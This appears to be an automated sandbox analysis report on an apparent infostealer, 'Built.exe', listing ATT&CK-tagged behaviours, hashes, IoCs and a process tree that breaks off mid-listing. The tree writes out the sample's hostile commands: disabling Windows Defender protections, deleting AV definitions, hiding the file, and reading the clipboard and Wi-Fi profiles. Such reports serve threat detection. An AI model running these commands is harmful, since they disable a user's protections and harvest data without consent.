fc7cf4173e8b7c8ffa34da9930565f5bde69f9ef12e5f48d59f0922ea6049c5e

Analysis

max time kernel
149s
max time network
151s
platform
windows10-ltsc 2021_x64
resource
win10ltsc2021-20241023-en
resource tags

arch:x64arch:x86image:win10ltsc2021-20241023-enlocale:en-usos:windows10-ltsc 2021-x64system
submitted
30-11-2024 13:10

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Built.exe
Size

7.6MB
MD5

02f6a88b2cc0cf3550cae0276458101d
SHA1

970128e3f97385cec995ea85c04324d90d5b7d3b
SHA256

fc7cf4173e8b7c8ffa34da9930565f5bde69f9ef12e5f48d59f0922ea6049c5e
SHA512

a9c8ebb9878c4ef1fe9b4e42652df9da760cdbb0c32c1118b7c9446d3a0b48ceedb7fb5b8f121c4d408358aaaa972d449d017b0ce902a65d90898dfd434488d7
SSDEEP

196608:MVHYawfI9jUCzi4H1qSiXLGVi7DMgpZ3Q0VMwICEc/jq:xIHziK1piXLGVE4Ue0VJ2

Score

10^/10

collection credential_access defense_evasion discovery evasion execution persistence privilege_escalation spyware stealer upx

Malware Config

Signatures

Deletes Windows Defender Definitions 2 TTPs 1 IoCs

Uses mpcmdrun utility to delete all AV definitions.

evasion

Impair Defenses

T1562

Command and Scripting Interpreter

T1059

pid	Process
4380	MpCmdRun.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
4316	powershell.exe
1716	powershell.exe
2756	powershell.exe
3888	powershell.exe

Drops file in Drivers directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Built.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
928	cmd.exe
1124	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
216	rar.exe

Loads dropped DLL 17 IoCs

pid	Process
556	Built.exe
556	Built.exe
556	Built.exe
556	Built.exe
556	Built.exe
556	Built.exe
556	Built.exe
556	Built.exe
556	Built.exe
556	Built.exe
556	Built.exe
556	Built.exe
556	Built.exe
556	Built.exe
556	Built.exe
556	Built.exe
556	Built.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
49	discord.com
51	discord.com

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
13	ip-api.com
43	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Enumerates processes with tasklist 1 TTPs 5 IoCs

discovery

Process Discovery

T1057

pid	Process
64	tasklist.exe
2308	tasklist.exe
4212	tasklist.exe
2436	tasklist.exe
3060	tasklist.exe

Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
3616	cmd.exe

UPX packed file 59 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x00280000000450d6-21.dat	upx
behavioral1/memory/556-25-0x00007FFD76B80000-0x00007FFD771E3000-memory.dmp	upx
behavioral1/files/0x004f0000000450c9-27.dat	upx
behavioral1/memory/556-48-0x00007FFD8F810000-0x00007FFD8F81F000-memory.dmp	upx
behavioral1/memory/556-47-0x00007FFD86460000-0x00007FFD86487000-memory.dmp	upx
behavioral1/files/0x00280000000450d0-46.dat	upx
behavioral1/files/0x00280000000450cf-45.dat	upx
behavioral1/files/0x00280000000450ce-44.dat	upx
behavioral1/files/0x00280000000450c8-39.dat	upx
behavioral1/files/0x00280000000450db-38.dat	upx
behavioral1/files/0x00280000000450da-37.dat	upx
behavioral1/files/0x00280000000450d9-36.dat	upx
behavioral1/files/0x00280000000450d5-33.dat	upx
behavioral1/files/0x00280000000450d3-32.dat	upx
behavioral1/files/0x00280000000450cd-43.dat	upx
behavioral1/files/0x00280000000450cc-42.dat	upx
behavioral1/files/0x00280000000450cb-41.dat	upx
behavioral1/files/0x00760000000450ca-40.dat	upx
behavioral1/files/0x00280000000450d4-30.dat	upx
behavioral1/memory/556-54-0x00007FFD85E90000-0x00007FFD85EBB000-memory.dmp	upx
behavioral1/memory/556-56-0x00007FFD8D3D0000-0x00007FFD8D3E9000-memory.dmp	upx
behavioral1/memory/556-58-0x00007FFD85E60000-0x00007FFD85E85000-memory.dmp	upx
behavioral1/memory/556-60-0x00007FFD84A40000-0x00007FFD84BBF000-memory.dmp	upx
behavioral1/memory/556-62-0x00007FFD85C40000-0x00007FFD85C59000-memory.dmp	upx
behavioral1/memory/556-64-0x00007FFD86EF0000-0x00007FFD86EFD000-memory.dmp	upx
behavioral1/memory/556-66-0x00007FFD85A50000-0x00007FFD85A84000-memory.dmp	upx
behavioral1/memory/556-71-0x00007FFD76AB0000-0x00007FFD76B7E000-memory.dmp	upx
behavioral1/memory/556-70-0x00007FFD76B80000-0x00007FFD771E3000-memory.dmp	upx
behavioral1/memory/556-73-0x00007FFD75E50000-0x00007FFD76383000-memory.dmp	upx
behavioral1/memory/556-78-0x00007FFD863C0000-0x00007FFD863CD000-memory.dmp	upx
behavioral1/memory/556-80-0x00007FFD769F0000-0x00007FFD76AA3000-memory.dmp	upx
behavioral1/memory/556-77-0x00007FFD85E90000-0x00007FFD85EBB000-memory.dmp	upx
behavioral1/memory/556-75-0x00007FFD85000000-0x00007FFD85014000-memory.dmp	upx
behavioral1/memory/556-81-0x00007FFD85E60000-0x00007FFD85E85000-memory.dmp	upx
behavioral1/memory/556-95-0x00007FFD84A40000-0x00007FFD84BBF000-memory.dmp	upx
behavioral1/memory/556-107-0x00007FFD85C40000-0x00007FFD85C59000-memory.dmp	upx
behavioral1/memory/556-179-0x00007FFD85A50000-0x00007FFD85A84000-memory.dmp	upx
behavioral1/memory/556-223-0x00007FFD76AB0000-0x00007FFD76B7E000-memory.dmp	upx
behavioral1/memory/556-225-0x00007FFD75E50000-0x00007FFD76383000-memory.dmp	upx
behavioral1/memory/556-322-0x00007FFD85A50000-0x00007FFD85A84000-memory.dmp	upx
behavioral1/memory/556-319-0x00007FFD84A40000-0x00007FFD84BBF000-memory.dmp	upx
behavioral1/memory/556-313-0x00007FFD76B80000-0x00007FFD771E3000-memory.dmp	upx
behavioral1/memory/556-328-0x00007FFD769F0000-0x00007FFD76AA3000-memory.dmp	upx
behavioral1/memory/556-751-0x00007FFD76B80000-0x00007FFD771E3000-memory.dmp	upx
behavioral1/memory/556-876-0x00007FFD85A50000-0x00007FFD85A84000-memory.dmp	upx
behavioral1/memory/556-864-0x00007FFD75E50000-0x00007FFD76383000-memory.dmp	upx
behavioral1/memory/556-875-0x00007FFD85C40000-0x00007FFD85C59000-memory.dmp	upx
behavioral1/memory/556-874-0x00007FFD84A40000-0x00007FFD84BBF000-memory.dmp	upx
behavioral1/memory/556-873-0x00007FFD85E60000-0x00007FFD85E85000-memory.dmp	upx
behavioral1/memory/556-872-0x00007FFD8D3D0000-0x00007FFD8D3E9000-memory.dmp	upx
behavioral1/memory/556-871-0x00007FFD85E90000-0x00007FFD85EBB000-memory.dmp	upx
behavioral1/memory/556-870-0x00007FFD8F810000-0x00007FFD8F81F000-memory.dmp	upx
behavioral1/memory/556-869-0x00007FFD86460000-0x00007FFD86487000-memory.dmp	upx
behavioral1/memory/556-868-0x00007FFD86EF0000-0x00007FFD86EFD000-memory.dmp	upx
behavioral1/memory/556-867-0x00007FFD769F0000-0x00007FFD76AA3000-memory.dmp	upx
behavioral1/memory/556-866-0x00007FFD863C0000-0x00007FFD863CD000-memory.dmp	upx
behavioral1/memory/556-865-0x00007FFD85000000-0x00007FFD85014000-memory.dmp	upx
behavioral1/memory/556-863-0x00007FFD76AB0000-0x00007FFD76B7E000-memory.dmp	upx
behavioral1/memory/556-853-0x00007FFD76B80000-0x00007FFD771E3000-memory.dmp	upx

Drops file in Windows directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SystemTemp	chrome.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
4540	cmd.exe
1336	PING.EXE

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
2432	cmd.exe
4368	netsh.exe

Detects videocard installed 1 TTPs 3 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
1552	WMIC.exe
1168	WMIC.exe
4708	WMIC.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
828	systeminfo.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133774458734669005"	chrome.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
1336	PING.EXE

Suspicious behavior: EnumeratesProcesses 58 IoCs

pid	Process
4316	powershell.exe
3888	powershell.exe
4316	powershell.exe
3888	powershell.exe
4056	WMIC.exe
4056	WMIC.exe
4056	WMIC.exe
4056	WMIC.exe
1552	WMIC.exe
1552	WMIC.exe
1552	WMIC.exe
1552	WMIC.exe
1168	WMIC.exe
1168	WMIC.exe
1168	WMIC.exe
1168	WMIC.exe
4872	WMIC.exe
4872	WMIC.exe
4872	WMIC.exe
4872	WMIC.exe
1124	powershell.exe
1124	powershell.exe
1124	powershell.exe
336	powershell.exe
336	powershell.exe
336	powershell.exe
1716	powershell.exe
1716	powershell.exe
4612	powershell.exe
4612	powershell.exe
5016	WMIC.exe
5016	WMIC.exe
5016	WMIC.exe
5016	WMIC.exe
4948	chrome.exe
4948	chrome.exe
2780	WMIC.exe
2780	WMIC.exe
2780	WMIC.exe
2780	WMIC.exe
548	WMIC.exe
548	WMIC.exe
548	WMIC.exe
548	WMIC.exe
2756	powershell.exe
2756	powershell.exe
2756	powershell.exe
4708	WMIC.exe
4708	WMIC.exe
4708	WMIC.exe
4708	WMIC.exe
2360	powershell.exe
2360	powershell.exe
2360	powershell.exe
3160	chrome.exe
3160	chrome.exe
3160	chrome.exe
3160	chrome.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 5 IoCs

pid	Process
4948	chrome.exe
4948	chrome.exe
4948	chrome.exe
4948	chrome.exe
4948	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4316	powershell.exe
Token: SeDebugPrivilege	64	tasklist.exe
Token: SeDebugPrivilege	3888	powershell.exe
Token: SeIncreaseQuotaPrivilege	4316	powershell.exe
Token: SeSecurityPrivilege	4316	powershell.exe
Token: SeTakeOwnershipPrivilege	4316	powershell.exe
Token: SeLoadDriverPrivilege	4316	powershell.exe
Token: SeSystemProfilePrivilege	4316	powershell.exe
Token: SeSystemtimePrivilege	4316	powershell.exe
Token: SeProfSingleProcessPrivilege	4316	powershell.exe
Token: SeIncBasePriorityPrivilege	4316	powershell.exe
Token: SeCreatePagefilePrivilege	4316	powershell.exe
Token: SeBackupPrivilege	4316	powershell.exe
Token: SeRestorePrivilege	4316	powershell.exe
Token: SeShutdownPrivilege	4316	powershell.exe
Token: SeDebugPrivilege	4316	powershell.exe
Token: SeSystemEnvironmentPrivilege	4316	powershell.exe
Token: SeRemoteShutdownPrivilege	4316	powershell.exe
Token: SeUndockPrivilege	4316	powershell.exe
Token: SeManageVolumePrivilege	4316	powershell.exe
Token: 33	4316	powershell.exe
Token: 34	4316	powershell.exe
Token: 35	4316	powershell.exe
Token: 36	4316	powershell.exe
Token: SeIncreaseQuotaPrivilege	3888	powershell.exe
Token: SeSecurityPrivilege	3888	powershell.exe
Token: SeTakeOwnershipPrivilege	3888	powershell.exe
Token: SeLoadDriverPrivilege	3888	powershell.exe
Token: SeSystemProfilePrivilege	3888	powershell.exe
Token: SeSystemtimePrivilege	3888	powershell.exe
Token: SeProfSingleProcessPrivilege	3888	powershell.exe
Token: SeIncBasePriorityPrivilege	3888	powershell.exe
Token: SeCreatePagefilePrivilege	3888	powershell.exe
Token: SeBackupPrivilege	3888	powershell.exe
Token: SeRestorePrivilege	3888	powershell.exe
Token: SeShutdownPrivilege	3888	powershell.exe
Token: SeDebugPrivilege	3888	powershell.exe
Token: SeSystemEnvironmentPrivilege	3888	powershell.exe
Token: SeRemoteShutdownPrivilege	3888	powershell.exe
Token: SeUndockPrivilege	3888	powershell.exe
Token: SeManageVolumePrivilege	3888	powershell.exe
Token: 33	3888	powershell.exe
Token: 34	3888	powershell.exe
Token: 35	3888	powershell.exe
Token: 36	3888	powershell.exe
Token: SeIncreaseQuotaPrivilege	4056	WMIC.exe
Token: SeSecurityPrivilege	4056	WMIC.exe
Token: SeTakeOwnershipPrivilege	4056	WMIC.exe
Token: SeLoadDriverPrivilege	4056	WMIC.exe
Token: SeSystemProfilePrivilege	4056	WMIC.exe
Token: SeSystemtimePrivilege	4056	WMIC.exe
Token: SeProfSingleProcessPrivilege	4056	WMIC.exe
Token: SeIncBasePriorityPrivilege	4056	WMIC.exe
Token: SeCreatePagefilePrivilege	4056	WMIC.exe
Token: SeBackupPrivilege	4056	WMIC.exe
Token: SeRestorePrivilege	4056	WMIC.exe
Token: SeShutdownPrivilege	4056	WMIC.exe
Token: SeDebugPrivilege	4056	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4056	WMIC.exe
Token: SeRemoteShutdownPrivilege	4056	WMIC.exe
Token: SeUndockPrivilege	4056	WMIC.exe
Token: SeManageVolumePrivilege	4056	WMIC.exe
Token: 33	4056	WMIC.exe
Token: 34	4056	WMIC.exe

Suspicious use of FindShellTrayWindow 28 IoCs

pid	Process
4948	chrome.exe
4948	chrome.exe
4948	chrome.exe
4948	chrome.exe
4948	chrome.exe
4948	chrome.exe
4948	chrome.exe
4948	chrome.exe
4948	chrome.exe
4948	chrome.exe
4948	chrome.exe
4948	chrome.exe
4948	chrome.exe
4948	chrome.exe
4948	chrome.exe
4948	chrome.exe
4948	chrome.exe
4948	chrome.exe
4948	chrome.exe
4948	chrome.exe
4948	chrome.exe
4948	chrome.exe
4948	chrome.exe
4948	chrome.exe
4948	chrome.exe
4948	chrome.exe
4948	chrome.exe
4948	chrome.exe

Suspicious use of SendNotifyMessage 26 IoCs

pid	Process
4948	chrome.exe
4948	chrome.exe
4948	chrome.exe
4948	chrome.exe
4948	chrome.exe
4948	chrome.exe
4948	chrome.exe
4948	chrome.exe
4948	chrome.exe
4948	chrome.exe
4948	chrome.exe
4948	chrome.exe
4948	chrome.exe
4948	chrome.exe
4948	chrome.exe
4948	chrome.exe
4948	chrome.exe
4948	chrome.exe
4948	chrome.exe
4948	chrome.exe
4948	chrome.exe
4948	chrome.exe
4948	chrome.exe
4948	chrome.exe
4948	chrome.exe
4948	chrome.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1116 wrote to memory of 556	1116	Built.exe	82
PID 1116 wrote to memory of 556	1116	Built.exe	82
PID 556 wrote to memory of 4868	556	Built.exe	83
PID 556 wrote to memory of 4868	556	Built.exe	83
PID 556 wrote to memory of 3032	556	Built.exe	84
PID 556 wrote to memory of 3032	556	Built.exe	84
PID 556 wrote to memory of 3176	556	Built.exe	86
PID 556 wrote to memory of 3176	556	Built.exe	86
PID 3032 wrote to memory of 4316	3032	cmd.exe	89
PID 3032 wrote to memory of 4316	3032	cmd.exe	89
PID 3176 wrote to memory of 64	3176	cmd.exe	90
PID 3176 wrote to memory of 64	3176	cmd.exe	90
PID 4868 wrote to memory of 3888	4868	cmd.exe	91
PID 4868 wrote to memory of 3888	4868	cmd.exe	91
PID 556 wrote to memory of 4892	556	Built.exe	93
PID 556 wrote to memory of 4892	556	Built.exe	93
PID 4892 wrote to memory of 4056	4892	cmd.exe	95
PID 4892 wrote to memory of 4056	4892	cmd.exe	95
PID 556 wrote to memory of 2420	556	Built.exe	149
PID 556 wrote to memory of 2420	556	Built.exe	149
PID 2420 wrote to memory of 2468	2420	cmd.exe	99
PID 2420 wrote to memory of 2468	2420	cmd.exe	99
PID 3032 wrote to memory of 4380	3032	cmd.exe	151
PID 3032 wrote to memory of 4380	3032	cmd.exe	151
PID 556 wrote to memory of 1504	556	Built.exe	101
PID 556 wrote to memory of 1504	556	Built.exe	101
PID 1504 wrote to memory of 3324	1504	cmd.exe	103
PID 1504 wrote to memory of 3324	1504	cmd.exe	103
PID 556 wrote to memory of 324	556	Built.exe	104
PID 556 wrote to memory of 324	556	Built.exe	104
PID 324 wrote to memory of 1552	324	cmd.exe	106
PID 324 wrote to memory of 1552	324	cmd.exe	106
PID 556 wrote to memory of 4224	556	Built.exe	107
PID 556 wrote to memory of 4224	556	Built.exe	107
PID 4224 wrote to memory of 1168	4224	cmd.exe	180
PID 4224 wrote to memory of 1168	4224	cmd.exe	180
PID 556 wrote to memory of 3616	556	Built.exe	112
PID 556 wrote to memory of 3616	556	Built.exe	112
PID 556 wrote to memory of 3608	556	Built.exe	114
PID 556 wrote to memory of 3608	556	Built.exe	114
PID 3616 wrote to memory of 628	3616	cmd.exe	160
PID 3616 wrote to memory of 628	3616	cmd.exe	160
PID 556 wrote to memory of 3532	556	Built.exe	116
PID 556 wrote to memory of 3532	556	Built.exe	116
PID 3532 wrote to memory of 2308	3532	cmd.exe	119
PID 3532 wrote to memory of 2308	3532	cmd.exe	119
PID 3608 wrote to memory of 4212	3608	cmd.exe	120
PID 3608 wrote to memory of 4212	3608	cmd.exe	120
PID 556 wrote to memory of 2168	556	Built.exe	121
PID 556 wrote to memory of 2168	556	Built.exe	121
PID 556 wrote to memory of 928	556	Built.exe	122
PID 556 wrote to memory of 928	556	Built.exe	122
PID 556 wrote to memory of 2184	556	Built.exe	124
PID 556 wrote to memory of 2184	556	Built.exe	124
PID 556 wrote to memory of 2160	556	Built.exe	125
PID 556 wrote to memory of 2160	556	Built.exe	125
PID 556 wrote to memory of 2432	556	Built.exe	129
PID 556 wrote to memory of 2432	556	Built.exe	129
PID 2168 wrote to memory of 4872	2168	cmd.exe	131
PID 2168 wrote to memory of 4872	2168	cmd.exe	131
PID 556 wrote to memory of 224	556	Built.exe	132
PID 556 wrote to memory of 224	556	Built.exe	132
PID 556 wrote to memory of 1004	556	Built.exe	134
PID 556 wrote to memory of 1004	556	Built.exe	134

Views/modifies file attributes 1 TTPs 3 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
628	attrib.exe
5088	attrib.exe
4960	attrib.exe

C:\Users\Admin\AppData\Local\Temp\Built.exe
"C:\Users\Admin\AppData\Local\Temp\Built.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1116
- C:\Users\Admin\AppData\Local\Temp\Built.exe
  "C:\Users\Admin\AppData\Local\Temp\Built.exe"
  2⤵
  - Drops file in Drivers directory
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:556
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Built.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4868
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Built.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3888
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3032
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4316
  - - C:\Program Files\Windows Defender\MpCmdRun.exe
      "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
      4⤵
      Deletes Windows Defender Definitions
      PID:4380
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3176
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:64
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4892
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4056
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2420
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
      4⤵
      PID:2468
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1504
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
      4⤵
      PID:3324
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:324
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      Suspicious behavior: EnumeratesProcesses
      PID:1552
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4224
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      Suspicious behavior: EnumeratesProcesses
      PID:1168
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\Built.exe""
    3⤵
    - Hide Artifacts: Hidden Files and Directories
    - Suspicious use of WriteProcessMemory
    PID:3616
  - - C:\Windows\system32\attrib.exe
      attrib +h +s "C:\Users\Admin\AppData\Local\Temp\Built.exe"
      4⤵
      Views/modifies file attributes
      PID:628
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3608
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:4212
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3532
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:2308
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2168
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:4872
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    PID:928
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      Suspicious behavior: EnumeratesProcesses
      PID:1124
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:2184
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:2436
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:2160
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:3344
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
    3⤵
    - System Network Configuration Discovery: Wi-Fi Discovery
    PID:2432
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profile
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:4368
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    PID:224
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:828
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
    3⤵
    PID:1004
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
      4⤵
      PID:2716
- - C:\Windows\system32\cmd.exe
